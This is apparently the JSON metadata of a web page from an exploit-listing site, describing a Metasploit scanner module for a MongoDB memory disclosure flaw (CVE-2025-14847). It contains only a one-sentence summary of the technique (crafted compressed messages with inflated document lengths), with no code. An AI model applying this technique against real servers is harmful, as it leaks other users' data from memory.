redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"MongoDB Memory Disclosure (CVE-2025-14847) - Mongobleed_MSF:AUXILIARY-SCANNER-MONGODB-CVE_2025_14847_MONGOBLEED- zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=33340","og_locale":"en_US","og_type":"article","og_title":"MongoDB Memory Disclosure (CVE-2025-14847) - Mongobleed_MSF:AUXILIARY-SCANNER-MONGODB-CVE_2025_14847_MONGOBLEED- zero redgem","og_description":"{“lastseen”:”2025-12-30T19:04:46″,”description”:”This module exploits a memory disclosure vulnerability in MongoDB’s zlib decompression handling CVE-2025-14847. By sending crafted OPCOMPRESSED messages with inflated BSON document lengths, the server...","og_url":"https:\/\/zero.redgem.net\/?p=33340","og_site_name":"zero redgem","article_published_time":"2025-12-30T13:49:43+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"18 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=33340#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=33340"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"MongoDB Memory Disclosure (CVE-2025-14847) – Mongobleed_MSF:AUXILIARY-SCANNER-MONGODB-CVE_2025_14847_MONGOBLEED-","datePublished":"2025-12-30T13:49:43+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=33340"},"wordCount":3536,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CVE","CVSS","CVSS-8.7","exploit","HIGH","metasploit","news","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=33340#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=33340","url":"https:\/\/zero.redgem.net\/?p=33340","name":"MongoDB Memory Disclosure (CVE-2025-14847) - Mongobleed_MSF:AUXILIARY-SCANNER-MONGODB-CVE_2025_14847_MONGOBLEED- zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2025-12-30T13:49:43+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=33340#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=33340"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=33340#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"MongoDB Memory Disclosure (CVE-2025-14847) – Mongobleed_MSF:AUXILIARY-SCANNER-MONGODB-CVE_2025_14847_MONGOBLEED-"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/33340","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=33340"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/33340\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=33340"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=33340"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=33340"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}